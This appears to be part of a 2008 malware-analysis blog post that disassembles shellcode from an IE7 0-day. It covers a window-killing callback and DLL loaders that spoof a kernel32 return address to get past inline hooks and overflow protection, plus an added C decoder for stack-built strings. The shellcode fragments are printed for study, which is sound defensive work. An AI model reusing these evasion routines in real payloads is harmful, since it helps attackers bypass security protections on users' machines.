[Original] Analysis of the shellcode used by the IE7 0-day vulnerability (Part 3)
2008-12-13 00:52
GetEnumProcAddress:          ; returns the address of the EnumWindows callback
004071EE  EB 02              jmp short 004071F2
004071F0  58                 pop eax
004071F1  C3                 retn
004071F2  E8 F9FFFFFF        call 004071F0

This is the usual call/pop GetPC trick: the call pushes its return address 004071F7, which is the first instruction of EnumWindowsProc, and the pop eax at the call target turns that return address into the callback pointer.

EnumWindowsProc:             ; if the window is an IE window, close it; if it belongs to a thread other than the current one, also increment the counter (here I wonder whether it would be more reasonable to only close windows belonging to its own thread?)
004071F7  56                 push esi
004071F8  57                 push edi
004071F9  83EC 08            sub esp, 8
004071FC  8BFC               mov edi, esp
004071FE  6A 08              push 8
00407200  57                 push edi
00407201  3E:FF77 14         push dword ptr [edi+14]
00407205  E8 5D020000        call <Get_GetClassNameA>
0040720A  FFD0               call eax
0040720C  8BFC               mov edi, esp
0040720E  68 616D6500        push 656D61
00407213  68 49454672        push 72464549
00407218  8BF4               mov esi, esp              ; "IEFrame"
0040721A  B9 08000000        mov ecx, 8
0040721F  F3:A6              repe cmps byte ptr es:[edi], byte ptr [esi]
00407221  75 2F              jnz short 00407252        ; is the window class name IE's "IEFrame"? if not, jump away and do nothing
00407223  6A 00              push 0
00407225  3E:FF7424 20       push dword ptr ds:[esp+20]
0040722A  E8 24020000        call <Get_GetWindowThreadProcessId>
0040722F  FFD0               call eax
00407231  8BF8               mov edi, eax
00407233  E8 CB010000        call <Get_GetCurrentThreadId>
00407238  FFD0               call eax
0040723A  3BF8               cmp edi, eax
0040723C  74 08              je short 00407246         ; jump if the window's thread is our own thread
0040723E  36:8B4424 20       mov eax, dword ptr [esp+20]
00407243  3E:FF00            inc dword ptr [eax]
00407246  3E:FF7424 1C       push dword ptr ds:[esp+1C]
0040724B  E8 EF010000        call <Get_DestroyWindow>
00407250  FFD0               call eax
00407252  83C4 10            add esp, 10
00407255  5F                 pop edi
00407256  5E                 pop esi
00407257  B8 01000000        mov eax, 1
0040725C  C3                 retn

A few points worth tracing on the stack. After push esi, push edi and sub esp,8, [edi+14] is the hwnd argument and, at 0040723E, [esp+20] is the lParam argument, so the counter being incremented lives at the address the caller passed to EnumWindows. GetClassNameA(hwnd, buf, 8) fills the 8-byte stack buffer, and the two pushes build the eight bytes "IEFrame\0" below it; repe cmpsb with ecx=8 therefore compares the terminator too, so only a class name exactly equal to "IEFrame" matches. The thread check matters because DestroyWindow only succeeds for windows created by the calling thread: for an IEFrame window owned by another thread the counter is bumped and DestroyWindow is still attempted. Note also that the callback returns with a bare retn rather than retn 8, so it leaves its two stdcall arguments on the stack for the caller; eax=1 tells EnumWindows to keep enumerating.

Geturlmon:                   ; gets the base address of urlmon.dll. When calling LoadLibraryA it tries to bypass overflow protection and inline hooks.
0040725D  68 6F6E0000        push 6E6F
00407262  68 75726C6D        push 6D6C7275
00407267  EB 15              jmp short 0040727E
00407269  8D4424 04          lea eax, dword ptr [esp+4]
0040726D  50                 push eax
0040726E  E8 22FEFFFF        call <FindRetCodeInkernel32>
00407273  50                 push eax
00407274  E8 4A020000        call <Get_LoadLibraryA>
00407279  E9 E2FEFFFF        jmp <CallPassingInlineHook>
0040727E  E8 E6FFFFFF        call 00407269
00407283  83C4 08            add esp, 8
00407286  C3                 retn

The two pushes leave "urlmon\0\0" on the stack, and the jmp/call pair pushes 00407283 as a return address, so lea eax,[esp+4] produces a pointer to that string, which is pushed as LoadLibraryA's argument. FindRetCodeInkernel32 returns the address of a ret instruction inside kernel32, and that address is pushed as LoadLibraryA's return address before the jump to CallPassingInlineHook (not shown in this part) transfers control into the API in a way intended to step over an inline hook on its entry. Any check of the return address from inside LoadLibraryA thus sees a caller in kernel32 rather than in heap or stack memory. When LoadLibraryA does its retn 4, it lands on the kernel32 ret, which in turn returns to 00407283; add esp,8 discards the string and the function returns with the module base in eax. The following three routines are the same template with a different name.

Getntdll:                    ; gets the base address of ntdll.dll, same scheme as Geturlmon
00407287  6A 6C              push 6C
00407289  68 6E74646C        push 6C64746E
0040728E  EB 15              jmp short 004072A5
00407290  8D4424 04          lea eax, dword ptr [esp+4]
00407294  50                 push eax
00407295  E8 FBFDFFFF        call <FindRetCodeInkernel32>
0040729A  50                 push eax
0040729B  E8 23020000        call <Get_LoadLibraryA>
004072A0  E9 BBFEFFFF        jmp <CallPassingInlineHook>
004072A5  E8 E6FFFFFF        call 00407290
004072AA  83C4 08            add esp, 8
004072AD  C3                 retn

GetUser32:
004072AE  68 33320000        push 3233
004072B3  68 75736572        push 72657375
004072B8  EB 15              jmp short 004072CF
004072BA  8D4424 04          lea eax, dword ptr [esp+4]
004072BE  50                 push eax
004072BF  E8 D1FDFFFF        call <FindRetCodeInkernel32>
004072C4  50                 push eax
004072C5  E8 F9010000        call <Get_LoadLibraryA>
004072CA  E9 91FEFFFF        jmp <CallPassingInlineHook>
004072CF  E8 E6FFFFFF        call 004072BA
004072D4  83C4 08            add esp, 8
004072D7  C3                 retn

Getshdocvw:
004072D8  68 63767700        push 777663
004072DD  68 7368646F        push 6F646873
004072E2  EB 15              jmp short 004072F9
004072E4  8D4424 04          lea eax, dword ptr [esp+4]
004072E8  50                 push eax
004072E9  E8 A7FDFFFF        call <FindRetCodeInkernel32>
004072EE  50                 push eax
004072EF  E8 CF010000        call <Get_LoadLibraryA>
004072F4  E9 67FEFFFF        jmp <CallPassingInlineHook>
004072F9  E8 E6FFFFFF        call 004072E4
004072FE  83C4 08            add esp, 8
00407301  C3                 retn

Getvgx:                      ; this function does not seem to be called anywhere; "vgx" is something I pulled straight out of the strings, and whether the function itself has a bug is open to question.
00407302  68 76677800        push 786776
00407307  EB 15              jmp short 0040731E
00407309  8D4424 04          lea eax, dword ptr [esp+4]
0040730D  50                 push eax
0040730E  E8 82FDFFFF        call <FindRetCodeInkernel32>
00407313  50                 push eax
00407314  E8 AA010000        call <Get_LoadLibraryA>
00407319  E9 42FEFFFF        jmp <CallPassingInlineHook>
0040731E  E8 E6FFFFFF        call 00407309
00407323  83C4 04            add esp, 4
00407326  C3                 retn

Since "vgx\0" fits in a single dword, this variant needs only one push and cleans up with add esp,4 instead of add esp,8.
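The DLL names above ("urlmon", "ntdll", "user32", "shdocvw", "vgx") and the eight-byte "IEFrame\0" comparand in EnumWindowsProc are all built on the stack out of push immediates. As an added example (not code from the original post or from the shellcode), here is a small decoder that takes the raw bytes of such a run of push imm32 / push imm8 instructions and reconstructs the string exactly as it sits in memory, including the sign-extension of push imm8 that makes "push 6C" contribute "l\0\0\0". The byte sequences are copied from the listing; the function and constant names are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Decode a run of x86 "push imm" instructions (68 imm32 / 6A imm8) into the
 * byte string they leave on the stack. Each push lowers ESP by 4, so the last
 * push lands at the lowest address: the stack image is the 32-bit operands
 * concatenated in reverse push order. Returns the number of stack bytes
 * produced (a multiple of 4), or 0 if the buffer does not start with a push
 * or `out` is too small. `out` is NUL-terminated on success. */
size_t decode_push_string(const uint8_t *code, size_t len, char *out, size_t outsz)
{
    uint32_t chunks[16];
    size_t n = 0, i = 0;

    while (i < len && n < sizeof chunks / sizeof chunks[0]) {
        if (code[i] == 0x68 && i + 5 <= len) {
            /* push imm32: operand is little-endian, so byte order == memory order */
            chunks[n++] = (uint32_t)code[i + 1] | (uint32_t)code[i + 2] << 8 |
                          (uint32_t)code[i + 3] << 16 | (uint32_t)code[i + 4] << 24;
            i += 5;
        } else if (code[i] == 0x6A && i + 2 <= len) {
            /* push imm8: sign-extended to 32 bits, so "push 6C" stores "l\0\0\0" */
            chunks[n++] = (uint32_t)(int32_t)(int8_t)code[i + 1];
            i += 2;
        } else {
            break;  /* first non-push instruction ends the string-building run */
        }
    }
    if (n == 0 || outsz < n * 4 + 1)
        return 0;

    size_t w = 0;
    for (size_t k = n; k-- > 0;)            /* reverse order reproduces the stack layout */
        for (int b = 0; b < 4; b++)
            out[w++] = (char)(chunks[k] >> (8 * b));
    out[w] = '\0';
    return w;
}

/* Byte sequences taken from the listing above: the push instructions that open
 * Geturlmon, Getntdll, GetUser32, Getshdocvw and Getvgx, and the two pushes
 * that build the "IEFrame" comparand in EnumWindowsProc. */
static const uint8_t PUSH_URLMON[]  = {0x68,0x6F,0x6E,0x00,0x00, 0x68,0x75,0x72,0x6C,0x6D};
static const uint8_t PUSH_NTDLL[]   = {0x6A,0x6C, 0x68,0x6E,0x74,0x64,0x6C};
static const uint8_t PUSH_USER32[]  = {0x68,0x33,0x32,0x00,0x00, 0x68,0x75,0x73,0x65,0x72};
static const uint8_t PUSH_SHDOCVW[] = {0x68,0x63,0x76,0x77,0x00, 0x68,0x73,0x68,0x64,0x6F};
static const uint8_t PUSH_VGX[]     = {0x68,0x76,0x67,0x78,0x00};
static const uint8_t PUSH_IEFRAME[] = {0x68,0x61,0x6D,0x65,0x00, 0x68,0x49,0x45,0x46,0x72};

/* Does the decoded stack string equal `expected` (as a C string)? */
int push_string_is(const uint8_t *code, size_t len, const char *expected)
{
    char buf[64];
    return decode_push_string(code, len, buf, sizeof buf) != 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    struct { const char *label; const uint8_t *code; size_t len; } samples[] = {
        {"Geturlmon",  PUSH_URLMON,  sizeof PUSH_URLMON},
        {"Getntdll",   PUSH_NTDLL,   sizeof PUSH_NTDLL},
        {"GetUser32",  PUSH_USER32,  sizeof PUSH_USER32},
        {"Getshdocvw", PUSH_SHDOCVW, sizeof PUSH_SHDOCVW},
        {"Getvgx",     PUSH_VGX,     sizeof PUSH_VGX},
        {"IEFrame",    PUSH_IEFRAME, sizeof PUSH_IEFRAME},
    };
    for (size_t s = 0; s < sizeof samples / sizeof samples[0]; s++) {
        char buf[64];
        size_t nbytes = decode_push_string(samples[s].code, samples[s].len, buf, sizeof buf);
        printf("%-11s %2zu stack bytes -> \"%s\"\n", samples[s].label, nbytes, buf);
    }
    return 0;
}
```

The returned byte count is the same number the shellcode has to account for afterwards: 8 for the two-push names (hence add esp,8 and the ecx=8 in the "IEFrame" comparison, which covers the terminator), and 4 for "vgx" (hence add esp,4). Pointing the decoder at the first byte after a run, or at a buffer that is too small, returns 0 rather than a partial string.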